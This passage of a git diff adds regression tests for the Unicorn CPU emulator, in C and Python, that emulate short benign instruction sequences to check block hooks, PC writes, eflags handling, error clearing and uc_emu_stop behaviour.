mu.mem_map(RSP_ADDR, PAGE_SIZE) + + mu.mem_write(CODE_ADDR, binary1) + mu.reg_write(UC_X86_REG_RSP, RSP_ADDR) + try: + self.assertEqual(mu.emu_start(CODE_ADDR, CODE_ADDR + PAGE_SIZE, 0), UC_ERR_FETCH_INVALID) + except UcError as e: + print("ERROR: %s" % e) + + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/block_test.c 
b/ai_anti_malware/unicorn/unicorn-master/tests/regress/block_test.c new file mode 100644 index 0000000..5af825f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/block_test.c @@ -0,0 +1,82 @@ +#include +#include +#include + +#include + +static int count = 1; + +// Callback function for tracing code (UC_HOOK_CODE & UC_HOOK_BLOCK) +// @address: address where the code is being executed +// @size: size of machine instruction being executed +// @user_data: user data passed to tracing APIs. +void cb_hookblock(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { + fprintf(stderr, "# >>> Tracing basic block at 0x%"PRIx64", block size = 0x%x\n", address, size); + if (address != 0x1000000 && address != 0x1000200) { + fprintf(stderr, "not ok %d - address != 0x1000000 && address != 0x1000200\n", count++); + _exit(1); + } + fprintf(stderr, "ok %d - address (0x%x) is start of basic block\n", count++, (uint32_t)address); + if (size != 0x200) { + fprintf(stderr, "not ok %d - basic block size != 0x200\n", count++); + _exit(1); + } + fprintf(stderr, "ok %d - basic block size is correct\n", count++); +} + +int main() { + uc_engine *uc; + + fprintf(stderr, "# basic block callback test\n"); + fprintf(stderr, "# there are only two basic blocks 0x1000000-0x10001ff and 0x1000200-0x10003ff\n"); + + uc_err err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); + if (err != UC_ERR_OK) { + fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); + exit(0); + } + fprintf(stderr, "ok %d - uc_open\n", count++); + + err = uc_mem_map(uc, 0x1000000, 4096, UC_PROT_ALL); + if (err != UC_ERR_OK) { + fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); + exit(0); + } + fprintf(stderr, "ok %d - uc_mem_map\n", count++); + + uint8_t code[1024]; + //build a program that consists of 1019 nops followed by a jump -512 + //this program contains exactly 2 basic blocks, a block of 512 nops, followed + //by a loop body containing 507 nops and jump to the top of the 
loop + //the first basic block begins at address 0x1000000, and the second + //basic block begins at address 0x1000200 + memset(code, 0x90, sizeof(code)); + memcpy(code + 1024 - 5, "\xe9\x00\xfe\xff\xff", 5); + + err = uc_mem_write(uc, 0x1000000, code, sizeof(code)); + if (err != UC_ERR_OK) { + fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); + exit(0); + } + fprintf(stderr, "ok %d - uc_mem_write\n", count++); + + uc_hook h1; + + err = uc_hook_add(uc, &h1, UC_HOOK_BLOCK, cb_hookblock, NULL, 1, 0); + if (err != UC_ERR_OK) { + fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); + exit(0); + } + fprintf(stderr, "ok %d - uc_hook_add\n", count++); + + err = uc_emu_start(uc, 0x1000000, 0x1000000 + sizeof(code), 0, 1030); + if (err != UC_ERR_OK) { + fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); + exit(0); + } + fprintf(stderr, "ok %d - uc_emu_start\n", count++); + + fprintf(stderr, "ok %d - Done", count++); + + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/callback-pc.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/callback-pc.py new file mode 100644 index 0000000..77f4e5a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/callback-pc.py @@ -0,0 +1,90 @@ +#!/usr/bin/env python + +# reg_write() can't modify PC from within trace callbacks +# issue #210 + +from __future__ import print_function +from unicorn import * +from unicorn.arm_const import * + +import regress + +BASE_ADDRESS = 0x10000000 + +# sub sp, #0xc +THUMB_CODE = "\x83\xb0" * 5 + +# callback for tracing instructions +def hook_code(uc, address, size, user_data): + print(">>> Tracing instruction at 0x%x, instruction size = %u" % (address, size)) + mu = user_data + print(">>> Setting PC to 0xffffffff") + mu.reg_write(UC_ARM_REG_PC, 0xffffffff) + +# callback for tracing basic blocks +def hook_block(uc, address, size, user_data): + print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size)) + 
mu = user_data + print(">>> Setting PC to 0xffffffff") + mu.reg_write(UC_ARM_REG_PC, 0xffffffff) + +class CallBackPCTest(regress.RegressTest): + + def test_instruction_trace(self): + try: + # initialize emulator in ARM's Thumb mode + mu = Uc(UC_ARCH_ARM, UC_MODE_THUMB) + + # map some memory + mu.mem_map(BASE_ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(BASE_ADDRESS, THUMB_CODE) + + # setup stack + mu.reg_write(UC_ARM_REG_SP, BASE_ADDRESS + 2 * 1024 * 1024) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code, user_data=mu) + + # emulate one instruction + mu.emu_start(BASE_ADDRESS, BASE_ADDRESS + len(THUMB_CODE), count=1) + + # the instruction trace callback set PC to 0xffffffff, so at this + # point, the PC value should be 0xffffffff. + pc = mu.reg_read(UC_ARM_REG_PC) + self.assertEqual(pc, 0xffffffff, "PC not set to 0xffffffff by instruction trace callback") + + except UcError as e: + self.assertFalse(0, "ERROR: %s" % e) + + def test_block_trace(self): + try: + # initialize emulator in ARM's Thumb mode + mu = Uc(UC_ARCH_ARM, UC_MODE_THUMB) + + # map some memory + mu.mem_map(BASE_ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(BASE_ADDRESS, THUMB_CODE) + + # setup stack + mu.reg_write(UC_ARM_REG_SP, BASE_ADDRESS + 2 * 1024 * 1024) + + # trace blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, hook_block, user_data=mu) + + # emulate one instruction + mu.emu_start(BASE_ADDRESS, BASE_ADDRESS + len(THUMB_CODE), count=1) + + # the block callback set PC to 0xffffffff, so at this point, the PC + # value should be 0xffffffff. 
+ pc = mu.reg_read(UC_ARM_REG_PC) + self.assertEqual(pc, 0xffffffff, "PC not set to 0xffffffff by block callback") + + except UcError as e: + self.assertFalse(0, "ERROR: %s" % e) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/crash_tb.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/crash_tb.py new file mode 100644 index 0000000..9ecf61c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/crash_tb.py @@ -0,0 +1,37 @@ +#!/usr/bin/python + +from unicorn import * +from unicorn.x86_const import * + +import regress + +CODE_ADDR = 0x0 +binary1 = b'\xb8\x02\x00\x00\x00' +binary2 = b'\xb8\x01\x00\x00\x00' + +class CrashTB(regress.RegressTest): + + def runTest(self): + mu = Uc(UC_ARCH_X86, UC_MODE_64) + + mu.mem_map(CODE_ADDR, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(CODE_ADDR, binary1) + + # emu for maximum 1 sec. + mu.emu_start(CODE_ADDR, len(binary1), UC_SECOND_SCALE) + + self.assertEqual(0x2, mu.reg_read(UC_X86_REG_RAX)) + + # write machine code to be emulated to memory + mu.mem_write(CODE_ADDR, binary2) + + # emu for maximum 1 sec. 
+ mu.emu_start(CODE_ADDR, len(binary2), UC_SECOND_SCALE) + + self.assertEqual(0x1, mu.reg_read(UC_X86_REG_RAX)) + +if __name__ == '__main__': + regress.main() + diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/deadlock_1.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/deadlock_1.py new file mode 100644 index 0000000..269a573 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/deadlock_1.py @@ -0,0 +1,20 @@ +#!/usr/bin/python +# From issue #1 of Ryan Hileman + +from unicorn import * +import regress + +CODE = b"\x90\x91\x92" + +class DeadLock(regress.RegressTest): + + def runTest(self): + mu = Uc(UC_ARCH_X86, UC_MODE_64) + mu.mem_map(0x100000, 4 * 1024) + mu.mem_write(0x100000, CODE) + + with self.assertRaises(UcError): + mu.emu_start(0x100000, 0x1000 + len(CODE)) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/eflags_noset.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/eflags_noset.c new file mode 100644 index 0000000..7f1b971 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/eflags_noset.c @@ -0,0 +1,126 @@ +#include +#include +#include + +#include + +#define X86_CODE32 "\x9C\x68\xFF\xFE\xFF\xFF\x9D\x9C\x58\x9D" // pushf; push ffffffeff; popf; pushf; pop eax; popf +#define ADDRESS 0x1000000 +#define PAGE_8K (1 << 13) +#define PAGE_4K (1 << 12) +#define TARGET_PAGE_MASK ~(PAGE_4K - 1) +#define TARGET_PAGE_PREPARE(addr) (((addr) + PAGE_4K - 1) & TARGET_PAGE_MASK) +#define TARGET_PAGE_ALIGN(addr) (addr - (TARGET_PAGE_PREPARE(addr) - addr) & TARGET_PAGE_MASK) + +#if defined(__i386__) +typedef uint32_t puint; +#define PRIX3264 PRIX32 +#else +typedef uint64_t puint; +#define PRIX3264 PRIX64 +#endif + +uint32_t realEflags() +{ + puint val = 0; + +#if defined(__i386__) + puint i = 0xFFFFFEFF; //attempt to set ALL bits except trap flag. 
+ + __asm__("pushf\n\t" + "push %0\n\t" + "popf\n\t" + "pushf\n\t" + "pop %0\n\t" + "popf" + : "=r"(val) + : "r"(i) + : "%0"); +#elif defined(__x86_64__) + puint i = 0xFFFFFEFF; //attempt to set ALL bits except trap flag. + + __asm__("pushfq\n\t" + "pushq %0\n\t" + "popfq\n\t" + "pushfq\n\t" + "popq %0\n\t" + "popfq" + : "=r"(val) + : "r"(i) + : "%0"); +#endif + + printf("Real system eflags: 0x%08"PRIX3264"\n", val); + + return (uint32_t)val & 0xFFFFFFFF; +} + +static void VM_exec() +{ +#if defined(__i386__) || defined(__x86_64__) + uc_engine *uc; + uc_err err; + unsigned int r_eax, eflags, r_esp, realflags = 0; + + r_eax = 0; + r_esp = ADDRESS+0x100; //some safe distance from main code. + eflags = 0x00000206; + + // Initialize emulator in X86-32bit mode + err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); + if(err) + { + printf("Failed on uc_open() with error returned: %s\n", uc_strerror(err)); + return; + } + + err = uc_mem_map(uc, ADDRESS, (2 * 1024 * 1024), UC_PROT_ALL); + if(err != UC_ERR_OK) + { + printf("Failed to map memory %s\n", uc_strerror(err)); + return; + } + + // write machine code to be emulated to memory + err = uc_mem_write(uc, ADDRESS, X86_CODE32, sizeof(X86_CODE32) - 1); + if(err != UC_ERR_OK) + { + printf("Failed to write emulation code to memory, quit!: %s(len %lu)\n", uc_strerror(err), (unsigned long)sizeof(X86_CODE32) - 1); + return; + } + + // initialize machine registers + uc_reg_write(uc, UC_X86_REG_EAX, &r_eax); + uc_reg_write(uc, UC_X86_REG_ESP, &r_esp); //make stack pointer point to already mapped memory so we don't need to hook. 
+ uc_reg_write(uc, UC_X86_REG_EFLAGS, &eflags); + + // emulate machine code in infinite time + err = uc_emu_start(uc, ADDRESS, ADDRESS + (sizeof(X86_CODE32) - 1), 0, 0); + if(err) + { + printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); + + uc_close(uc); + return; + } + + uc_reg_read(uc, UC_X86_REG_EAX, &r_eax); + uc_reg_read(uc, UC_X86_REG_EFLAGS, &eflags); + + uc_close(uc); + + printf(">>> Emulation done. Below is the CPU context\n"); + printf(">>> EAX = 0x%08X\n", r_eax); + printf(">>> EFLAGS = 0x%08X\n", eflags); + + realflags = realEflags(); + + assert(r_eax == realflags); +#endif +} + +int main(int argc, char *argv[]) +{ + VM_exec(); + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/eflags_nosync.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/eflags_nosync.c new file mode 100644 index 0000000..37b7950 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/eflags_nosync.c @@ -0,0 +1,182 @@ +#include +#include +#include + +#include + +#define X86_CODE32 "\x33\xD2\x8A\xD4\x8B\xC8\x81\xE1\xFF\x00\x00\x00" // XOR edx,edx; MOV dl,ah; MOV ecx,eax; AND ecx,FF +#define ADDRESS 0x1000000 +#define PAGE_8K (1 << 13) +#define PAGE_4K (1 << 12) +#define TARGET_PAGE_MASK ~(PAGE_4K - 1) +#define TARGET_PAGE_PREPARE(addr) (((addr) + PAGE_4K - 1) & TARGET_PAGE_MASK) +#define TARGET_PAGE_ALIGN(addr) ((addr - (TARGET_PAGE_PREPARE(addr) - addr)) & TARGET_PAGE_MASK) + +static uint64_t instructions = 0; + +static void hook_ins(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) +{ + instructions++; +} + +static bool hook_invalid_mem(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data) +{ + uc_err err; + uint64_t address_align = TARGET_PAGE_ALIGN(address); + + if(address == 0) + { + printf("Address is 0, proof 0x%" PRIx64 "\n", address); + return false; + } + + switch(type) + { + default: + return false; + break; + case 
UC_MEM_WRITE_UNMAPPED: + printf("Mapping write address 0x%" PRIx64 " to aligned 0x%" PRIx64 "\n", address, address_align); + + err = uc_mem_map(uc, address_align, PAGE_8K, UC_PROT_ALL); + if(err != UC_ERR_OK) + { + printf("Failed to map memory on UC_MEM_WRITE_UNMAPPED %s\n", uc_strerror(err)); + return false; + } + + return true; + break; + case UC_MEM_READ_UNMAPPED: + + printf("Mapping read address 0x%" PRIx64 " to aligned 0x%" PRIx64 "\n", address, address_align); + + + err = uc_mem_map(uc, address_align, PAGE_8K, UC_PROT_ALL); + if(err != UC_ERR_OK) + { + printf("Failed to map memory on UC_MEM_READ_UNMAPPED %s\n", uc_strerror(err)); + return false; + } + + return true; + break; + } +} + +static void VM_exec() +{ + uc_engine *uc; + uc_err err; + uc_hook trace1, trace2; + unsigned int r_eax, r_ebx, r_ecx, r_edx, r_ebp, r_esp, r_esi, r_edi, r_eip, eflags; + unsigned int tr_eax, tr_ebx, tr_ecx, tr_edx, tr_ebp, tr_esp, tr_esi, tr_edi, tr_eip, t_eflags; + + + r_eax = tr_eax = 0x1DB10106; + r_ebx = tr_ebx = 0x7EFDE000; + r_ecx = tr_ecx = 0x7EFDE000; + r_edx = tr_edx = 0x00001DB1; + r_ebp = tr_ebp = 0x0018FF88; + r_esp = tr_esp = 0x0018FF14; + r_esi = tr_esi = 0x0; + r_edi = tr_edi = 0x0; + r_eip = tr_eip = 0x004939F3; + t_eflags = eflags = 0x00000206; + + // Initialize emulator in X86-32bit mode + err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); + if(err) + { + printf("Failed on uc_open() with error returned: %s", uc_strerror(err)); + return; + } + + err = uc_mem_map(uc, ADDRESS, (4 * 1024 * 1024), UC_PROT_ALL); + if(err != UC_ERR_OK) + { + printf("Failed to map memory %s", uc_strerror(err)); + return; + } + + // write machine code to be emulated to memory + err = uc_mem_write(uc, ADDRESS, X86_CODE32, sizeof(X86_CODE32) - 1); + if(err != UC_ERR_OK) + { + printf("Failed to write emulation code to memory, quit!: %s(len %zu)", uc_strerror(err), sizeof(X86_CODE32) - 1); + return; + } + + // initialize machine registers + uc_reg_write(uc, UC_X86_REG_EAX, &r_eax); + 
uc_reg_write(uc, UC_X86_REG_EBX, &r_ebx); + uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx); + uc_reg_write(uc, UC_X86_REG_EDX, &r_edx); + uc_reg_write(uc, UC_X86_REG_EBP, &r_ebp); + uc_reg_write(uc, UC_X86_REG_ESP, &r_esp); + uc_reg_write(uc, UC_X86_REG_ESI, &r_esi); + uc_reg_write(uc, UC_X86_REG_EDI, &r_edi); + uc_reg_write(uc, UC_X86_REG_EFLAGS, &eflags); + + uc_hook_add(uc, &trace1, UC_HOOK_MEM_READ_UNMAPPED | UC_HOOK_MEM_WRITE_UNMAPPED, (void *)hook_invalid_mem, NULL, 1, 0); + + // tracing all instruction by having @begin > @end + uc_hook_add(uc, &trace2, UC_HOOK_CODE, (void *)hook_ins, NULL, 1, 0); + + // emulate machine code in infinite time + err = uc_emu_start(uc, ADDRESS, ADDRESS + (sizeof(X86_CODE32) - 1), 0, 0); + if(err) + { + printf("Failed on uc_emu_start() with error returned %u: %s", err, uc_strerror(err)); + instructions = 0; + + uc_close(uc); + return; + } + + uc_reg_read(uc, UC_X86_REG_EAX, &r_eax); + uc_reg_read(uc, UC_X86_REG_EBX, &r_ebx); + uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx); + uc_reg_read(uc, UC_X86_REG_EDX, &r_edx); + uc_reg_read(uc, UC_X86_REG_EBP, &r_ebp); + uc_reg_read(uc, UC_X86_REG_ESP, &r_esp); + uc_reg_read(uc, UC_X86_REG_ESI, &r_esi); + uc_reg_read(uc, UC_X86_REG_EDI, &r_edi); + uc_reg_read(uc, UC_X86_REG_EIP, &r_eip); + uc_reg_read(uc, UC_X86_REG_EFLAGS, &eflags); + + uc_close(uc); + + printf(">>> Emulation done. Below is the CPU context\n"); + printf(">>> EAX = 0x%08X %s\n", r_eax, (r_eax == tr_eax ? "" : "(m)")); + printf(">>> EBX = 0x%08X %s\n", r_ebx, (r_ebx == tr_ebx ? "" : "(m)")); + printf(">>> ECX = 0x%08X %s\n", r_ecx, (r_ecx == tr_ecx ? "" : "(m)")); + printf(">>> EDX = 0x%08X %s\n", r_edx, (r_edx == tr_edx ? "" : "(m)")); + printf(">>> EBP = 0x%08X %s\n", r_ebp, (r_ebp == tr_ebp ? "" : "(m)")); + printf(">>> ESP = 0x%08X %s\n", r_esp, (r_esp == tr_esp ? "" : "(m)")); + printf(">>> ESI = 0x%08X %s\n", r_esi, (r_esi == tr_esi ? "" : "(m)")); + printf(">>> EDI = 0x%08X %s\n", r_edi, (r_edi == tr_edi ? 
"" : "(m)")); + printf(">>> EIP = 0x%08X %s\n", (r_eip - ADDRESS) + tr_eip, (r_eip == tr_eip ? "" : "(m)\n")); + printf(">>> EFLAGS = 0x%08X %s\n", eflags, (eflags == t_eflags ? "" : "(m)")); + + printf(">>> Instructions executed %" PRIu64 "\n", instructions); + + assert(r_eax == 0x1DB10106); + assert(r_ebx == 0x7EFDE000); + assert(r_ecx == 0x00000006); + assert(r_edx == 0x00000001); + assert(r_ebp == 0x0018FF88); + assert(r_esp == 0x0018FF14); + assert(r_esi == 0x00000000); + assert(r_edi == 0x00000000); + assert(eflags == 0x00000206); //we shouldn't fail this assert, eflags should be 0x00000206 because the last AND instruction produces a non-zero result. + + instructions = 0; +} + + +int main(int argc, char *argv[]) +{ + VM_exec(); + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/emu_clear_errors.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/emu_clear_errors.c new file mode 100644 index 0000000..7f03ec3 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/emu_clear_errors.c @@ -0,0 +1,151 @@ +#include +#include +#include + +#include + +static int count = 1; + +bool cb_hookunmapped(uc_engine *uc, uc_mem_type type, uint64_t address, uint32_t size, int64_t value, void *user_data) { + uint32_t pc = 0; + uc_reg_read(uc, UC_X86_REG_EIP, &pc); + fprintf(stderr, "mem unmapped: 0x%x type: %x address: 0x%"PRIx64" length: %x value: 0x%"PRIx64"\n", + pc, type, address, size, value); + + uc_err err = UC_ERR_OK; + err = uc_emu_stop(uc); + if (err != UC_ERR_OK) { + fprintf(stderr, "stop not ok"); + exit(0); + } + return true; +} + +// move esi, dword ptr [ecx + eax + 0x28] +// add esi, eax +// lea eax, dword ptr [ebp - 4] +// push eax +// push 0x40 +// push 0x10 +// push esi +// call some address +#define CODE "\x8B\x74\x01\x28" \ + "\x0C\xF0" \ + "\x8D\x45\xFC" \ + "\x50" \ + "\x6A\x40" \ + "\x6A\x10" \ + "\x56" \ + "\xFF\x15\x20\x20\x00\x10" + +int main() { + uc_engine *uc; + + uc_err err = uc_open(UC_ARCH_X86, 
UC_MODE_32, &uc); + if (err != UC_ERR_OK) { + fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); + exit(0); + } + fprintf(stderr, "ok %d - uc_open\n", count++); + + err = uc_mem_map(uc, 0x1000, 0x1000, UC_PROT_ALL); + if (err != UC_ERR_OK) { + fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); + exit(0); + } + fprintf(stderr, "ok %d - uc_mem_map: code\n", count++); + + uint8_t code[0x1000]; + memset(code, 0x0, sizeof(code)); + memcpy(code, CODE, sizeof(CODE)); + + err = uc_mem_write(uc, 0x1000, code, sizeof(code)); + if (err != UC_ERR_OK) { + fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); + exit(0); + } + fprintf(stderr, "ok %d - uc_mem_write: code\n", count++); + + uint32_t eip = 0x1000; + err = uc_reg_write(uc, UC_X86_REG_EIP, &eip); + if (err != UC_ERR_OK) { + fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); + exit(0); + } + fprintf(stderr, "ok %d - uc_reg_write: eip\n", count++); + + err = uc_mem_map(uc, 0x4000, 0x4000, UC_PROT_ALL); + if (err != UC_ERR_OK) { + fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); + exit(0); + } + fprintf(stderr, "ok %d - uc_mem_map: stack\n", count++); + + uint8_t stack[0x4000]; + memset(stack, 0x0, sizeof(stack)); + + err = uc_mem_write(uc, 0x4000, code, sizeof(code)); + if (err != UC_ERR_OK) { + fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); + exit(0); + } + fprintf(stderr, "ok %d - uc_mem_write: stack\n", count++); + + uint32_t esp = 0x6000; + err = uc_reg_write(uc, UC_X86_REG_ESP, &esp); + if (err != UC_ERR_OK) { + fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); + exit(0); + } + fprintf(stderr, "ok %d - uc_reg_write: esp\n", count++); + + uint32_t ebp = 0x6000; + err = uc_reg_write(uc, UC_X86_REG_EBP, &ebp); + if (err != UC_ERR_OK) { + fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); + exit(0); + } + fprintf(stderr, "ok %d - uc_reg_write: ebp\n", count++); + + uc_hook h1; + + err = uc_hook_add(uc, &h1, 
UC_HOOK_MEM_UNMAPPED, cb_hookunmapped, NULL, 1, 0); + if (err != UC_ERR_OK) { + fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); + exit(0); + } + fprintf(stderr, "ok %d - uc_hook_add\n", count++); + + // this should execute only a single instruction at 0x1000, because + // that instruction accesses invalid memory. + err = uc_emu_start(uc, 0x1000, 0x100F, 0, 0); + if (err != UC_ERR_OK) { + fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); + exit(0); + } + fprintf(stderr, "ok %d - uc_emu_start\n", count++); + + // yes, not necessary, but to demonstrate the UC API is working as expected + eip = 0x1004; + err = uc_reg_write(uc, UC_X86_REG_EIP, &eip); + if (err != UC_ERR_OK) { + fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); + exit(0); + } + fprintf(stderr, "ok %d - uc_reg_write: eip\n", count++); + + // this should execute the remaining instructions up to (but not includign) 0x100F. + // currently, it returns an error about an unmapped read. + // seems that this error should have been returned in the previous call + // to emu_start. 
+ err = uc_emu_start(uc, 0x1004, 0x100F, 0, 0); + if (err != UC_ERR_OK) { + fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); + exit(0); + } + fprintf(stderr, "ok %d - uc_emu_start\n", count++); + + fprintf(stderr, "ok %d - Done", count++); + + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/emu_clear_errors.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/emu_clear_errors.py new file mode 100644 index 0000000..4fb6b1d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/emu_clear_errors.py @@ -0,0 +1,80 @@ +#!/usr/bin/python + +from __future__ import print_function +import binascii +import regress + +from unicorn import * +from unicorn.x86_const import * + + +CODE = binascii.unhexlify(b"".join([ + b"8B 74 01 28", # mov esi, dword ptr [ecx + eax + 0x28] mapped: 0x1000 + b"03 F0", # add esi, eax 0x1004 + b"8D 45 FC", # lea eax, dword ptr [ebp - 4] 0x1006 + b"50", # push eax 0x1009 + b"6A 40", # push 0x40 0x100A + b"6A 10", # push 0x10 0x100C + b"56", # push esi 0x100E + b"FF 15 20 20 00 10" # call some address 0x100F + ]).replace(" ", "")) + + +def showpc(mu): + pc = mu.reg_read(UC_X86_REG_EIP) + print("pc: 0x%x" % (pc)) + + +class HookCodeStopEmuTest(regress.RegressTest): + def test_hook_code_stop_emu(self): + mu = Uc(UC_ARCH_X86, UC_MODE_32) + + # base of CODE + mu.mem_map(0x1000, 0x1000) + mu.mem_write(0x1000, CODE) + mu.reg_write(UC_X86_REG_EIP, 0x1000) + + # base of STACK + mu.mem_map(0x4000, 0x4000) + mu.mem_write(0x4000, "\x00" * 0x4000) + mu.reg_write(UC_X86_REG_ESP, 0x6000) + mu.reg_write(UC_X86_REG_EBP, 0x6000) + + mu.reg_write(UC_X86_REG_ECX, 0x0) + mu.reg_write(UC_X86_REG_EAX, 0x0) + + def _hook(_, access, address, length, value, context): + pc = mu.reg_read(UC_X86_REG_EIP) + print("mem unmapped: pc: %x access: %x address: %x length: %x value: %x" % ( + pc, access, address, length, value)) + mu.emu_stop() + return True + + mu.hook_add(UC_HOOK_MEM_UNMAPPED, _hook) + + # we only 
expect the following instruction to execute, + # and it will fail, because it accesses unmapped memory. + # mov esi, dword ptr [ecx + eax + 0x28] mapped: 0x1000 + mu.emu_start(0x1000, 0x100F) + showpc(mu) + + # now, we want to reuse the emulator, and keep executing + # from the next instruction + mu.reg_write(UC_X86_REG_EIP, 0x1004) + self.assertEqual(0x1004, mu.reg_read(UC_X86_REG_EIP)) + + # we expect the following instructions to execute + # add esi, eax 0x1004 + # lea eax, dword ptr [ebp - 4] 0x1006 + # push eax 0x1009 + # push 0x40 0x100A + # push 0x10 0x100C + # push esi 0x100E + # + # currently, a UC_ERR_READ_UNMAPPED exception is raised here + mu.emu_start(0x1004, 0x100F) + showpc(mu) + + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/emu_stop_in_hook_overrun.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/emu_stop_in_hook_overrun.c new file mode 100644 index 0000000..81ea93f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/emu_stop_in_hook_overrun.c @@ -0,0 +1,130 @@ +/* +Test for uc_emu_stop() in code hook not always stopping the emu at the current instruction. +(Sometimes it will execute and stop at the next instruction). +*/ + +// windows specific +#ifdef _MSC_VER +#include +#include +#include +#define PRIx64 "llX" +#ifdef DYNLOAD +#include +#else // DYNLOAD +#include +#ifdef _WIN64 +#pragma comment(lib, "unicorn_staload64.lib") +#else // _WIN64 +#pragma comment(lib, "unicorn_staload.lib") +#endif // _WIN64 +#endif // DYNLOAD + +// posix specific +#else // _MSC_VER +#include +#include "pthread.h" +#endif // _MSC_VER + +// common includes +#include + + +// Test MIPS little endian code. +// This should loop forever. 
+const uint64_t addr = 0x100000; +const unsigned char test_code[] = { + 0x00,0x00,0x00,0x00, // 100000: nop + 0x00,0x00,0x00,0x00, // 100004: nop + 0x00,0x00,0x00,0x00, // 100008: nop + 0x00,0x00,0x00,0x00, // 10000C: nop +}; +bool test_passed_ok = false; + + +// This hook is used to show that code is executing in the emulator. +static void mips_codehook(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) +{ + printf("Executing: %"PRIx64"\n", address); + if( address == 0x100008 ) + { + printf("Stopping at: %"PRIx64"\n", address); + uc_emu_stop(uc); + } +} + + +int main(int argc, char **argv, char **envp) +{ + uc_engine *uc; + uc_err err; + uc_hook hhc; + uint32_t val; + + // dynamically load shared library +#ifdef DYNLOAD + uc_dyn_load(NULL, 0); +#endif + + // Initialize emulator in MIPS 32bit little endian mode + printf("uc_open()\n"); + err = uc_open(UC_ARCH_MIPS, UC_MODE_MIPS32, &uc); + if (err) + { + printf("Failed on uc_open() with error returned: %u\n", err); + return err; + } + + // map in a page of mem + printf("uc_mem_map()\n"); + err = uc_mem_map(uc, addr, 0x1000, UC_PROT_ALL); + if (err) + { + printf("Failed on uc_mem_map() with error returned: %u\n", err); + return err; + } + + // write machine code to be emulated to memory + printf("uc_mem_write()\n"); + err = uc_mem_write(uc, addr, test_code, sizeof(test_code)); + if( err ) + { + printf("Failed on uc_mem_write() with error returned: %u\n", err); + return err; + } + + // hook all instructions by having @begin > @end + printf("uc_hook_add()\n"); + uc_hook_add(uc, &hhc, UC_HOOK_CODE, mips_codehook, NULL, 1, 0); + if( err ) + { + printf("Failed on uc_hook_add(code) with error returned: %u\n", err); + return err; + } + + // start executing code + printf("uc_emu_start()\n"); + uc_emu_start(uc, addr, addr+sizeof(test_code), 0, 0); + + + // done executing, print some reg values as a test + uc_reg_read(uc, UC_MIPS_REG_PC, &val); printf("pc is %X\n", val); + test_passed_ok = val == 0x100008; + + // 
